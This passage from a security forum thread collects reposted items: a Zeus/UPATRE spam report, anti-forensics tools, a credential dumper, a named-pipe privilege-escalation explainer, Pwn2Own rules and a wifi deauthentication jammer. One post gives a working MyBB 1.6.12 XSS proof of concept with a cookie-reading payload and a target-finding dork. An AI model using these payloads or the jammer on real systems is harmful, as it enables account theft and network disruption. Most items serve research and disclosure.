execute and to be scheduled to execute in the future. UPATRE campaigns that use Encryption to Bypass Security Here are the campaigns we saw this week, with the hashes and sizes for the .zip, the UPATRE .exe, the .enc file, and the decrypted GameOver Zeus .exe file that came from that file. For each campaign, you will see some information about the spam message, including the .zip file that was attached and its size and hash, and the .exe file that was unpacked from that .zip file. Then you will see a screenshot of the email message, followed by the URL that the Encrypted GameOver Zeus file was downloaded from, and some statistics about the file AFTER it was decrypted. ALL OF THESE SPAM CAMPAIGNS ARE RELATED TO EACH OTHER! They are all being distributed by the criminals behind the Cutwail malware delivery infrastructure. It is likely that many different criminals are paying to use this infrastructure. [TABLE] [TR] [TD]Campaign: 2014-01-27.ADP[/TD] [TD]Messages Seen: 2606[/TD] [TD]Subject: Invoice #(RND)[/TD] [/TR] [TR] [TD]From: ADP - Payroll Services[/TD] [TD]payroll.invoices@adp.com[/TD] [/TR] [TR] [TD]Invoice.zip[/TD] [TD]9767 bytes[/TD] [TD]b624601794380b2bee0769e09056769c[/TD] [/TR] [TR] [TD]Invoice.PDF.exe[/TD] [TD]18944 bytes[/TD] [TD]8d3bf40cfbcf03ed13f0a900726170b3 [/TD] [/TR] [TR] [/TR] [/TABLE] Sursa: CyberCrime & Doing Time: GameOver Zeus now uses Encryption to bypass Perimeter Security
-
[h=1]SmartDec[/h] Native code to C/C++ decompiler. [h=2]Standalone[/h] Supports x86 and x86-64 architectures. Reads ELF and PE file formats. Reconstructs functions, their names and arguments, local and global variables, expressions, integer, pointer and structural types, all types of control-flow structures, including switch. Has a nice graphical user interface with one-click navigation between assembler code and reconstructed program. The only decompiler that handles 64-bit code. [h=2]IDA Pro plug-in[/h] Enjoys all executable file formats supported by the disassembler. Benefits from IDA's signature search, parsers of debug information, and demanglers. Push-button decompilation of a chosen function or the whole program. Easy jumping between the disassembler and the decompiled code. Full GUI integration. Sursa: SmartDec | derevenets.com
-
Programmer for CC2538 backdoor UART bootloader [h=1]CC2538-prog[/h] CC2538-prog is a command line application to communicate with the CC2538 ROM bootloader. Copyright © 2014, Toby Jaffey <toby@1248.io> Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. [h=1]Instructions[/h] To use cc2538-prog, the chip must first be configured to enable the backdoor UART bootloader. The boards in the CC2538DK are preconfigured with the PER firmware which disable the backdoor UART bootloader. To enable it, we need to rewrite this flash. CC2538 Bootloader Backdoor - Texas Instruments Wiki The simplest way to do this is to flash the supplied file firmware/cc2538dk-contiki-demo.hex with the Windows Flash Programmer tool or Uniflash for Linux. To use the backdoor UART bootloader, your firmware must apply the change from the above link to startup_gcc.c (remove BOOTLOADER_BACKDOOR_DISABLE). This change is present in cc2538dk-contiki-demo.hex If successful, you should see a flashing LED. From now on, you may enable the bootloader at any time by removing the jumper on the SmartRF06 for RF2.6. Removing the jumper and pressing the EM RESET button will start the bootloader. Firmware may then be loaded with cc2538-prog. Once the firmware is loaded, the bootloader must be disabled before reset, by replacing the RF2.6 jumper. Sursa: https://github.com/1248/cc2538-prog
-
ADD is a physical memory anti-analysis tool designed to pollute memory with fake artifacts. This tool was first presented at Shmoocon 2014. Please note that this is a proof of concept tool. It forges OS objects in memory (poorly). It would be easy (very easy) to beat with better tool development. The tools would only need to provide better sanity checks of objects discovered during scanning. In that case, further development on ADD would be needed to beat new versions of forensics tools. The tool currently works only against Windows 7 SP1 x86. Huge portions of the driver code were based on the Windows DDK Sioctl driver code sample(because honestly, who wants to build device manager PnP code?). Haven't started source code versioning yet, just wanted to get the code out there so people can play with it. Started a Google code project for this before I remembered they restricted downloads on new projects (I guess all downloads are disabled now). FYI, there are places I don't do error checking where "real" programmers probably would. I'd like to point out that this is a PROOF OF CONCEPT tool. I don't think I'd run it on a target system without further testing and code auditing. Load the driver on a production system at your own risk. I haven't had any bugchecks with it yet, but YMMV. Driver: http://www.mediafire.com/download/v4jop3qois3gv4t/add-driver.zip User Agent: http://www.mediafire.com/download/see7o8rtnuwstp9/ADD_File.zip Reference Memory Image (with faked artifacts): http://www.mediafire.com/download/vvb0dbg2g2h1ukm/ADD-ref-image.zip Shmoocon Slides: ADD_Shmoocon Sursa: https://code.google.com/p/attention-deficit-disorder/
-
Facebook are juc?rii puternice – o nou? tehnologie de stocare la “rece” de doar 1 petabyte Publicat de Andrei Av?d?nei în Developers · ?tiri — 2 Feb, 2014 at 3:22 pm Facebook e probabil una din companiile ce de?ine cele mai multe informa?ii cu privire la, în general, tot ce înseamn? activitatea noastr? atât pe site-ul de socializare cat ?i pe site-urile conexe – cele care au un plugin al Facebook-ului, spre exemplu. Aceast? cantitate de informa?ie se afl? undeva foarte departe în profilele noastre ?i, de cele mai multe ori, sunt date de care re?eaua social? nu are nevoie prea des. Astfel c?, Facebook a încercat s? dezvolte tehnologii de tipul “stocare la rece” (cold storage), iar ultima realizare este un prototip ce se folose?te de stocarea datelor pe discuri Blu-ray. Jay Parikh, vice-pre?edinte la Facebook a explicat la Open Compute Summit cum acest prototip de cold storage ar putea ajuta re?eaua social? s? elibereze spa?iul vital de pe serverele lor. Pe scurt, noul sistem folose?te 10,000 de discuri Blu-Ray în acela?i timp pentru a stoca 1 petabyte de date. Articol complet: Facebook are juc?rii puternice – o nou? tehnologie de stocare la “rece” de doar 1 petabyte | WORLDIT
-
Arch Linux 2014.02.01 Is Now Available for Download February 2nd, 2014, 11:46 GMT · By Marius Nestor I can't believe that it's already February, and that another ISO image of the powerful Arch Linux distribution has been announced yesterday, as expected, on its official website. Unfortunately for some of you, Arch Linux is still not using the recently released Linux kernel 3.13. As such, Arch Linux 2014.02.01 is powered by Linux kernel 3.12.9, which is also the latest stable release of the upstream Linux 3.12 kernel series. Additionally, Arch Linux 2014.02.01 includes all the updated packages that were released during the past month, January 2014. As usual, existing Arch Linux users don’t need this new ISO image, as it's only intended for those of you who want to install Arch Linux on new machines. Arch Linux is a rolling-release Linux operating system, so in order to keep your Arch system up-to-date, use the sudo pacman -Syu or yaourt -Syua commands. Download Arch Linux 2014.02.01 right now from Softpedia. Follow @mariusnestor Sursa: Arch Linux 2014.02.01 Is Now Available for Download
-
[h=3]Namedpipe Impersonation Attack[/h] Privilege escalation through namedpipe impersonation attack was a real issue back in 2000 when a flaw in the service control manager allowed any user logged onto a machine to steal the identify of SYSTEM. We haven't heard a lot about this topic since then, is it still an issue? First of all, let's talk about the problem. When a process creates a namedpipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish. For example, let's assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a namedpipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over. Fortunately, Microsoft implemented and recently documented some restrictions and tools to help you manage the risk. First of all there are some flags buried in the CreateFile documentation to give control to the pipe client over what level of impersonation a server can perform. They are called the "Security Quality Of Service". There are 4 flags to define the impersonation level allowed. SECURITY_ANONYMOUS The server process cannot obtain identification information about the client, and it cannot impersonate the client. SECURITY_IDENTIFICATION The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedpipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read. SECURITY_IMPERSONATION - This is the default The server process can impersonate the client's security context on its local system. The server cannot impersonate the client on remote systems. SECURITY_DELEGATION The server process can impersonate the client's security context on remote systems. There are also 2 other flags: SECURITY_CONTEXT_TRACKING Specifies that any changes a client makes to its security context is reflected in a server that is impersonating it. If this option isn't specified, the server adopts the context of the client at the time of the impersonation and doesn't receive any changes. This option is honored only when the client and server process are on the same system. SECURITY_EFFECTIVE_ONLY Prevents a server from enabling or disabling a client's privilege or group while the server is impersonating. Note: Since the MSDN documentation for these flags is really weak, I used the definition that can be found in the book "Microsoft® Windows® Internals, Fourth Edition" by Mark Russinovich and David Solomon. Every time you create a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don't forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored. Unfortunately, you don't have access to the source code of all the software running on your machine. I bet there are dozen of software running on my machine right now opening pipes without using the SQOS flags. To "fix" that, Microsoft implemented some restrictions about who a server can impersonate in order to minimize the chances of being exploited. A server can impersonate a client only if one of the following is true. The caller has the SeImpersonatePrivilege privilege. The requested impersonation level is SecurityIdentification or SecurityAnonymous. The identity of the client is the same as the server. The token of the client was created using LogonUser from inside the same logon session as the server. Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege. If the attacker is a member of these groups, you have much bigger problems. The requested impersonation level in our case is SecurityImpersonation, so the second point does not apply. That leaves us with the last two conditions. Should we worry about them? I think so. Here are some examples: I'm on XP. I want to run an untrusted application. Since I read my old posts, I know that I can run the process using a stripped down version of my token. Unfortunately, my restricted token has the same identity as the normal token. It can then try to exploit all applications running on my desktop. This is bad. My main account is not administrator on the machine. When I want to install software, I use RunAs. This brings up a new problem. RunAs uses LogonUser, and it is called from the same logon session! That means that my untrusted application using a restricted token derived from a standard user token can now try to exploit and impersonate a process running with administrator rights! This is worse. But how real is all this? This is hard to say. I don't have an idea about the percentage of applications using the SQOS flags. We must not forget that allowing impersonation is also required and desired in certain cases. For fun I took the first application using namedpipes that came to my mind: Windbg. There is an option in Windbg to do kernel debugging and if the OS you are debugging is inside vmware, you can specify the namedpipe corresponding the COM1 port of the vmware image. By default it is "com_1". My untrusted application running with the restricted token was now listening on com_1, and, easy enough, as soon as I started windbg, the untrusted application was able to steal its token. To be fair I have to say that vmware displayed an error message telling me that the com_1 port was "not configured as expected". I should not have started windbg knowing that. But, eh, who reads error messages? What should we do now? Well, it turns out that Microsoft implemented two new restrictions in windows Vista to fix these problems. I don't think they are documented yet. If the token of a server is restricted, it can impersonate only clients also running with a restricted token. The server cannot impersonate a client running at a higher integrity level. These new restrictions are fixing both my issues. First of all my untrusted application can't be running with a restricted token anymore. Then, even if the untrusted application is running with my standard token, it won't be able to impersonate the processes that I start with the "Run As Administrator" elevation prompt because they are running with a High Integrity Level. Now it is time to come back to the main question: Is it still an issue? My answer is yes. Windows XP is still the most popular Windows version out there and there is no sign that Vista is going to catch up soon. But I have to admit that I'm relieved to see the light at the end of the tunnel! -- Some technical details: When you call ImpersonateNamedPipeClient and none of the conditions is met, the function still succeeds, but the impersonation level of the token is SecurityIdentification. If you want to try for yourself, you can find the code to create a server pipe and a client pipe on my code page. Related link: Impersonation isn't dangerous by David Leblanc Posted by nsylvain at 4:54 PM Sursa: The Final Stream: Namedpipe Impersonation Attack
-
MRG Effitas automatic XOR decryptor tool Posted by Zoltan Balazs on February 1, 2014 in Latest | 0 comments Malware writers tend to protect their binaries and configuration files with XOR encryption. Luckily, they never heard about the one-time-pad requirement, which requires “never reuse the XOR key”. Binary files usually have long sequence of null bytes, which means the short XOR key (4 ascii characters in most of the cases) used by the malware writers can be spotted in the binary as a recurring pattern. This Python script (tested and developed on Python 3.3) can find these recurring patterns in the beginning of the XOR encrypted binary, calculate the correct “offset” of the key, use this XOR key to decrypt the encrypted file, and check the result for known strings. The tool was able to find the correct XOR key in 90% of the cases, in other cases fine-tuning the default parameters can help. We used this tool to decyrpt the XOR encrypted binaries found in network dumps. For example when exploit kits (e.g. Neutrino) were able to infect the victim, and the payload is delivered to the victim as a XOR encrypted binary. For a list of parameters, run # python auto_xor_decryptor.py -h The tool is released under GPLv3 licence. The script can be found on our Github account: https://github.com/MRGEffitas/scripts/blob/master/auto_xor_decryptor.py An example run of the tool looks like the following: c:\python33\python auto_xor_decryptor.py --input malware\48_.mp3 Auto XOR decryptor by MRG Effitas. Developed and tested on Python 3.3!This tool can automatically find short XOR keys in a XOR encrypted binary file, and use that to decrypt the XOR encrypted binary. Most parameters are good on default but if it is not working for you, you might try to fine-tune those. XOR key: b’626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b6862? XOR key ascii: b’bjkh’ XOR key hex: b’626a6b68? Offset: 1 Final XOR key: b’jkhb’ Great success! input read from : malware\48_.mp3, output written to : decrypted MRG Effitas Team Sursa: Publishing of MRG Effitas automatic XOR decryptor tool | MRG Effitas
-
A Field Study of Run-Time Location Access Disclosures on Android Smartphones Huiqing Fu, Yulong Yang, Nileema Shingte, Janne Lindqvist, Marco Gruteser Rutgers University Please contact janne@winlab.rutgers.edu for any inquiries Abstract—Smartphone users are increasingly using apps that can access their location. Often these accesses can be without users knowledge and consent. For example, recent research has shown that installation-time capability disclosures are ineffective in informing people about their apps’ location access. In this paper, we present a four-week field study (N=22) on run-time location access disclosures. Towards this end, we implemented a novel method to disclose location accesses by location-enabled apps on participants’ smartphones. In particular, the method did not need any changes to participants’ phones beyond installing our study app. We randomly divided our participants to two groups: a Disclosure group (N=13), who received our disclosures and a No Disclosure group (N=9) who received no disclosures from us. Our results confirm that the Android platform’s location access disclosure method does not inform participants effectively. Almost all participants pointed out that their location was accessed by several apps they would have not expected to access their location. Further, several apps accessed their location more frequently than they expected. We conclude that our participants appreciated the transparency brought by our run-time disclosures and that because of the disclosures most of them had taken actions to manage their apps’ location access. Download: http://www.winlab.rutgers.edu/~janne/USECfieldstudy.pdf
-
[h=1]Dementia[/h]Dementia is a proof of concept memory anti-forensic toolkit designed for hiding various artifacts inside the memory dump during memory acquisition on Microsoft Windows operating system. By exploiting memory acquisition tools and hiding operating system artifacts (eg. processes, threads, etc.) from the analysis application, such as Volatility, Memoryze and others. Because of the flaws in some of the memory acquisition tools, Dementia can also hide operating system objects from the analysis tools completely from the user-mode. For further details about Dementia, check the 29c3 presentation (PDF or video below). Downloads Defeating Windows memory forensics.pdf Dementia-1.0-x64.zip Dementia-1.0.zip Sursa: https://code.google.com/p/dementia-forensics/
-
Quarks PwDump Mon 14 May 2012 By Sébastien Kaczmarek Quarks PwDump is new open source tool to dump various types of Windows credentials: local account, domain accounts, cached domain credentials and bitlocker. The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges and is still in beta test. Quarks PwDump is a native Win32 open source tool to extract credentials from Windows operating systems. It currently extracts : Local accounts NT/LM hashes + history Domain accounts NT/LM hashes + history stored in NTDS.dit file Cached domain credentials Bitlocker recovery information (recovery passwords & key packages) stored in NTDS.dit JOHN and LC format are handled. Supported OS are Windows XP / 2003 / Vista / 7 / 2008 / 8 Why another pwdump-like dumper tool? No tools can actually dump all kind of hash and bitlocker information at the same time, a combination of tools is always needed. Libesedb (http://sourceforge.net/projects/libesedb/) library encounters some rare crashs when parsing different NTDS.dit files. It's safer to directly use Microsoft JET/ESE API to parse databases originally built with same functions. Bitlocker case has been added even if some specific Microsoft tools could be used to dump those information. (Active Directory addons or VBS scripts) The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges. We plan to make it work full offline, for example on a disk image. How does it internally work? Case #1: Domain accounts hashes are extracted offline from NTDS.dit It's not currently full offline dump cause Quarks PwDump is dynamically linked with ESENT.dll (in charge of JET databases parsing) which differs between Windows versions. For example, it's not possible to parse Win 2008 NTDS.dit file from XP. In fact, record's checksum are computed in a different manner and database files appear corrupted for API functions. That's currently the main drawback of the tool, everything should be done on domain controller. However no code injection or service installation are made and it's possible to securely copy NTDS.dit file by the use of Microsoft VSS (Volume Shadow Copy Service). Case #2: Bitlocker information dump It's possible to retrieve interesting information from ActiveDirectory if some specific GPO have been applied by domain administrators (mainly "Turn on BitLocker backup to Active Directory" in group policy). Recovery password: it's a 48-digits passphrase which allow a user to mount its partition even if its password has been lost. This password can be used in Bitlocker recovery console. Key Package : it's a binary keyfile which allow an user to decipher data on a damaged disk or partition. It can be used with Microsoft tools, especially Bitlocker Repair Tool. For each entry found in NTDS.dit, Quarks PwDump show recovery password to STDOUT and keyfiles (key packages) are stored to separate files for each recovery GUID: {GUID_1}.pk, {GUID_2}.pk,... Volume GUID: an unique value for each BitLocker-encrypted volume. Recovery GUID: recovery password identifier, it could be the same for different encrypted volumes. Quarks PwDump does no retrieve TPM information yet. When ownership of the TPM is taken as part of turning on BitLocker, a hash of the ownership password can be taken and stored in AD directory service. This information can then be used to reset ownership of the TPM. This feature will be added in a further release. In an enterprise environment, those GPO should be often applied in order to ensure administrators can unlock a protected volume and employers can read specific files following an incident (intrusion or various malicious acts for example). Case #3: Local account and cached domain credentials There aren't something really new here, a lot of tools are already dumping them without any problems. However we have choosed an uncommmon way to dump them, only few tools use this technique. Hashes are extracted live from SAM and SECURITY hive in a proper way without code injection/service. In fact, we use native registry API, especially RegSaveKey() and RegLoadKey() functions which require SeBackup and SeRestore privileges. Next we mount SAM/REGISTRY hives on a different mount point and change all keys ACL in order to extend privileges to Administrator group and not LocalSystem only. That's why we choose to work on a backup to preserve system integrity. Writing this tool was not a really difficult challenge, windows hashes and bitlocker information storage methodology are mostly well documented. However it's an interesting project to understand strange Microsoft's implementation and choices for each kind of storage: High level obfuscation techniques are used for local and domain accounts hashes: many constants, atypical registry value name, useless ciphering layer, hidden constants stored in registry Class attribute,...However, it can be easily defeated. Used algorithms differ sometimes between windows version and global credentials storage approach isn't regular. We can find exhaustively: RC4, MD5, MD4, SHA-256, AES-256, AES-128 and DES. Bitlocker information are stored in cleartext in AD domain services. Project is still in beta test and we would really appreciate to have feedbacks or suggestions/comments about potential bugs. Binary and source code are available on GitHub (GNU GPL v3 license): Quarks PwDump v0.1b: https://github.com/quarkslab/quarkspwdump For NTDS parsing technical details, you can also refer to MISC MAG #59 article by Thibault Leveslin. Finally, we would like to greet NTDS hash dump (Csaba Barta), libesedb and creddump authors for their excellent work. Sursa: Quarks PwDump
-
Accidental API Key Exposure is a Major Problem This article, about how a security researcher managed to gain access to Prezi's source code by using credentials he found in a public BitBucket repo, became very popular recently. The author concludes his article by saying "Please be aware of what you put up on github/bitbucket." Accidentally posting API keys, as well as passwords and other sensitive information, on public source control repositories is a huge problem. It potentially allows anybody who comes across your code to access data, send communications, or even make purchases on your behalf. And yet API keys exposed in public GitHub repos is a common occurrence. As somebody who has accidentally posted private credentials on GitHub in the past myself, before quickly noticing and taking them down, I was interested to see how widespread the problem of inadvertently publishing private credentials is. I did a quick GitHub search for Twilio auth tokens and was alarmed at the results that were returned. (I had no reason in particular for choosing Twilio tokens over any other API tokens; I'm sure every major API provider is affected.) Combining that search with a simple Ruby script wrapping a regular expression, I was able to discover 187 Twilio auth tokens in a matter of minutes. One hundred and eighty seven. Sitting there waiting to be discovered by a GitHub search. And GitHub would only display the first 1000 results out of around 20,000. But this is just scratching the surface. When people realise that their API credentials are visible on a public repository, their first instinct is, as it should be, to remove them. But the problem is, removing the tokens and committing the result is not enough. While they will no longer appear in a GitHub code search, any sufficiently motivated person can scroll back through your repository's history on GitHub, and find your code containing your tokens, just as it was before you "removed" them. But, especially for side-projects or for casual GitHub users who might not yet fully understand the purpose or features of Git, this potential vulnerability may not be obvious - I have seen more than one person make the mistake of leaving API keys or passwords in their Git history. So what can we do about this? Replace sensitive information with placeholders If you aren't using Git for managing a project, and just want to throw it up on GitHub so you can share your code, the solution is simple: you can just remove your sensitive passwords from the code and replace them with an empty string or “<api key here>” or some other placeholder. But when you're actually using source control for managing your project, this solution starts to fall apart. You need another way of keeping your credentials out of your repository. Storing sensitive information outside of source control Some common methods of storing sensitive information that won't show up in your repository are: Environment variables - these have the added advantage of making it easy to have different API keys or passwords for different environments your application may be deployed on (like development, staging and production for a web app). Config files that are kept out of version control - these are typically JSON or YAML files that contain any sensitive information, like API keys or passwords, that should not be publicly available. Your application can then just import this file and access all of the information it needs. Depending on your programming language of choice, there may be a library available to help you with this. Depending on your programming language of choice, there may be some libraries available to help you with this, like nconf for Node.js, or any of these RubyGems. Removing sensitive information that's already in your repository As stated above, the history features of version control systems mean that simply removing the tokens and then committing the result is not enough. If you can, you might want to consider revoking the keys that have been made public, so that anybody who may have discovered them already will be prevented from using them. If not, your only option is to rewrite your entire commit history since the API keys were added. If you are using git, this is possible with the git-filter-branch command. GitHub has a good tutorial on it that details specifically the problem of removing sensitive data from a Git repository. Please be aware that this can cause problems if there are multiple collaborators on your project, as each collaborator will have to rebase their changes to be on top of yours. Accidental API key exposure is one of those problems that is easy to avoid as long as you keep it in mind from the beginning of a project, but once you've slipped up, it becomes very difficult to fix. By keeping the dangers in mind, and making sure you're always keeping your API keys, passwords, and any other sensitive information out of version control from the beginning, you're protecting yourself from a very real and very severe threat to the security of both you and your users. Sursa: Accidental API Key Exposure is a Major Problem | Ross Penman
-
MyBB 1.6.12 POST XSS 0day This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given. <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload MyBB throws out a SQL error: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<foo> <h1> <script> alert (bar) () ; //%' LOWER(t.subject) LIKE '%> < prompt \x41 \%42 constructor onload%') This made me analyze and reverse this to find the cause. After filtering out this was the correct input which can cause this error. This part should be constant or’(“\ To reproduce this issue you can add any char value in front on or’(“\ and 2 char values after or’(“\ and you cannot have any spaces in between them. This will be the skeleton: [1 char value]or’(“\[2 char values] Examples: 1or’(“\00 qor’(“\2a You can have a space like this qor’(“\ a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a%') How to Inject JavaScript and HTML? We can inject HTML + JavaScript but the search.php filters out ‘ “ [] – characters. This is the method you could use inject your payload. If we put our constant in the middle we can inject our payload in front and after it. If we inject it at the beginning of the constant the payload will be stored in this manner. [B]<Payload here>[/B]qor’(“\2a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<Payload Here>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') For example if we inject a HTML header at the beginning [B]<h1>Osanda</h1>[/B]qor’(“\2a It will look like this inside the source: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<h1>Osanda</h1>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') Now if we try injecting at the end of our payload it will be stored in two places like this in the source. qor’(“\2a[B]<Payload Here>[/B] The payload is thrown out in the SQL error itself. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOWER(t.subject) LIKE '%\2a<payload here>%')' at line 3 The second place is inside the query. SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a[B]<payload here>%[/B]') Example: This would be an example of JavaScript being interpreted <script>alert(/Osanda/)</script>. Notice that our string is converted to lower case characters due to the SQL query. Remember this filters out ‘ “ [] — characters. Therefore we can use and external script source for performing further client side attacks. Proof of Concept <html> <!-- Exploit-Title: MyBB 1.6.12 POST XSS 0day Google-Dork: inurl:index.php intext:Powered By MyBB Date: Februrary 2nd of 2014 Bug Discovered and Exploit Author: Osanda Malith Jayathissa Vendor Homepage: http://www.mybb.com Software Link: http://resources.mybb.com/downloads/mybb_1612.zip Version: 1.6.12 (older versions might be vulnerbale) Tested on: Windows 8 64-bit Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day --> <body> <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST"> <input type="hidden" name="action" value="do_search" /> <input type="hidden" name="keywords" value="qor'("\2a<script>alert(/XSS/)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> POC Video You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this. <script src=poc />qor'("\2a</script> This will be containing in the poc file. document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/> <h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie); alert('XSS by Osanda & HR'); Thanks to Hood3dRob1n for this idea I have no idea to inject SQL in this bug. You may give it a try and see. Sursa: MyBB 1.6.12 POST XSS 0day | Blog of Osanda Malith
-
- 1
-
-
Pwn2Own 2014: Rules and Unicorns Brian Gorenc, Manager, Vulnerability Research, HP Security Research HP’s Zero Day Initiative is once again expanding the scope of its annual Pwn2Own contest, with a new competition that combines multiple vulnerabilities for a challenge of unprecedented difficulty and reward. Last year we launched a plug-in track to the competition, in addition to our traditional browser targets. We’ll continue both tracks this year. For 2014, we’re introducing a complex Grand Prize challenge with multiple components, including a bypass of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections – truly an Exploit Unicorn worthy of myth and legend, plus $150,000 to the researcher who can tame it (for additional background on this new category, see additional blog post here). Pwn2Own prize funds this year are expected to total over half a million dollars (USD) in cash and non-cash awards. As they did last year, our friends at Google are joining us in sponsoring all targets in the 2014 competition. Contest dates The contest will take place March 12-13 in Vancouver, British Columbia, at the CanSecWest 2014 conference. The schedule of contestants and platforms will be determined by random drawing at the conference venue and posted at Pwn2Own.com prior to the start of competition. Rules and prizes The 2014 competition consists of three divisions: Browsers, Plug-Ins, and the Grand Prize. All target machines will be running the latest fully patched versions of the relevant operating systems (Windows 8.1 x64 and OS X Mavericks), installed in their default configurations. The vulnerability or vulnerabilities used in each attack must be unknown and not previously reported to the vendor. A particular vulnerability can only be used once across all categories. The first contestant to successfully compromise a target within the 30-minute time limit wins the prize in that category. The 2014 targets are: Browsers: Google Chrome on Windows 8.1 x64: $100,000 Microsoft Internet Explorer 11 on Windows 8.1 x64: $100,000 Mozilla Firefox on Windows 8.1 x64: $50,000 Apple Safari on OS X Mavericks: $65,000 Plug-ins: Adobe Reader running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Adobe Flash running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Oracle Java running in Internet Explorer 11 on Windows 8.1 x64 (requires click-through bypass): $30,000 “Exploit Unicorn” Grand Prize: SYSTEM-level code execution on Windows 8.1 x64 on Internet Explorer 11 x64 with EMET (Enhanced Mitigation Experience Toolkit) bypass: $150,000* Please see the Pwn2Own 2014 rules for complete descriptions of the challenges. In particular, taming the Exploit Unicorn is a multi-step process, and competitors should be as familiar as possible with the necessary sequence of vulnerabilities required: The initial vulnerability utilized in the attack must be in the browser. The browser’s sandbox must be bypassed using a vulnerability in the sandbox. A separate privilege escalation vulnerability must be used to obtain SYSTEM-level arbitrary code execution on the target. The exploit must work when Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections are enabled. In addition to the cash prizes listed above, successful competitors will receive the laptop on which they demonstrate the compromise. They’ll also receive 20,000 ZDI reward points, which immediately qualifies them for Silver standing in the benefits program. (ZDI Silver standing includes a one-time $5,000 cash payout, a 15% monetary bonus on all vulnerabilities submitted to ZDI during the next calendar year, a 25% reward-point bonus on all vulnerabilities submitted to ZDI over the next calendar year, and paid travel and registration to attend the 2014 DEFCON conference in Las Vegas.) As ever, vulnerabilities and exploit techniques revealed by contest winners will be disclosed to the affected vendors, and the proof of concept will become the property of HP in accordance with the HP ZDI program. If the affected vendors wish to coordinate an onsite transfer at the conference venue, HP ZDI is able to accommodate that request. The full set of rules for Pwn2Own 2014 is available here. They may be changed at any time without notice. Registration Pre-registration is required to ensure we have sufficient resources on hand in Vancouver. Please contact ZDI at zdi@hp.com to begin the registration process. (Email only, please; queries via Twitter, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine contestant order. Registration closes at 5pm Pacific time on March 10, 2014. Follow the action Pwn2Own.com will be updated periodically with blogs, photos and videos between now and the competition, and in real time during the event. If it becomes necessary to hold a drawing to determine contestant order, we will also update the site in real time during that process. Follow us on Twitter at @thezdi, and keep an eye on the #pwn2own hashtag for more coverage. Press: Please direct all Pwn2Own or ZDI-related media inquiries to Cassy Lalan, hpesp@bm.com. (*Real-life unicorn prize subject to availability) Sursa: Pwn2Own 2014: Rules and Unicorns - PWN2OWN
-
[h=1]wifijammer[/h] Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block's range with heavy access point saturation. Granularity is given in the options for more effective targeting. Requires: airmon-ng, python 2.7, python-scapy, a wireless card capable of injection [h=2]Usage[/h] [h=3]Simple[/h] python wifijammer.py This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through. Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths 